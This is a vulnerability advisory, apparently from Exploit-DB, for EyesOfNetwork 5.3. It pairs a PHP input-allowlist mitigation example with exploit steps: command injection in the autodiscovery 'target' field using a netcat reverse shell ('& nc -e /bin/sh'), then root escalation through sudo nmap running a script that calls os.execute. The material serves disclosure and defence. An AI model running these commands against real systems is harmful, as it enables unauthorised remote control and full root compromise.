Vendor: EyesOfNetwork
By: Audencia Business SCHOOL Red Team
CVSS: 9.8 (HIGH)
Authenticated Remote Code Execution flaw
CWE: N/A
Product Name: EyesOfNetwork
Affected Version From: 5.3
Affected Version To: 5.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2021

EyesOfNetwork 5.3 – RCE & PrivEsc

A user with access to "/autodiscover.php" can execute remote commands, get a reverse shell and root the targeted machine.

Mitigation:

Restrict access to the /autodiscover.php page and ensure that user input is properly validated.
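
One way to do the input validation named above, as an added example (not EyesOfNetwork code and not from the original advisory): an allowlist check that accepts only an IP address, a CIDR block or a hostname before the value reaches any command line. The function name, the sample values and the "nmap -sn" command are assumptions made for illustration.

```php
<?php
// Added example: allowlist validation for a scan "target" value.
// validate_scan_target() is a hypothetical helper, not part of EyesOfNetwork.

// Returns the target unchanged when it is an IP, a CIDR block or a hostname,
// and null for anything else (spaces, "&", ";", quotes, leading "-", ...).
function validate_scan_target($raw)
{
    if (!is_string($raw) || $raw === '' || strlen($raw) > 253) {
        return null;
    }

    // CIDR: the address must be a valid IP and the prefix must fit its family.
    if (strpos($raw, '/') !== false) {
        $parts = explode('/', $raw);
        if (count($parts) !== 2 || !preg_match('/\A\d{1,3}\z/', $parts[1])) {
            return null;
        }
        if (filter_var($parts[0], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
            $max = 32;
        } elseif (filter_var($parts[0], FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) {
            $max = 128;
        } else {
            return null;
        }
        return ((int) $parts[1] <= $max) ? $raw : null;
    }

    if (filter_var($raw, FILTER_VALIDATE_IP)) {
        return $raw;
    }

    // Hostname: dot-separated labels of letters, digits and inner hyphens.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $raw) ? $raw : null;
}

// Constructed sample inputs; the last one has the shape of the "&" input
// described in this advisory.
$samples = array('192.168.1.10', '10.0.0.0/24', 'fe80::1', 'srv01.example.lan',
                 '10.0.0.0/33', '192.168.1.10 & id');
foreach ($samples as $s) {
    $target = validate_scan_target($s);
    if ($target === null) {
        echo "REJECT  $s\n";
        continue;
    }
    // Assumed scanner command; the value is still quoted as a single argument.
    echo 'ACCEPT  nmap -sn ' . escapeshellarg($target) . "\n";
}
```

The check rejects rather than strips: a value that fails validation is never repaired and passed on.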

Exploit-DB raw data:

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3

#Authenticated Remote Code Execution flaw > remote shell > PrivEsc
#
#A user with access to "/autodiscover.php" can execute remote commands, get a reverse shell and root the targeted machine.

==============================================
Initial RCE

On the web page: https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not checked. It is possible to put any command after an "&", so RCE is possible with a simple netcat command like:

& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc

The EyesOfNetwork apache user can run "nmap" with sudo privileges and the NOPASSWD attribute, so it is possible to become the root user with a classic PrivEsc method:
 
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script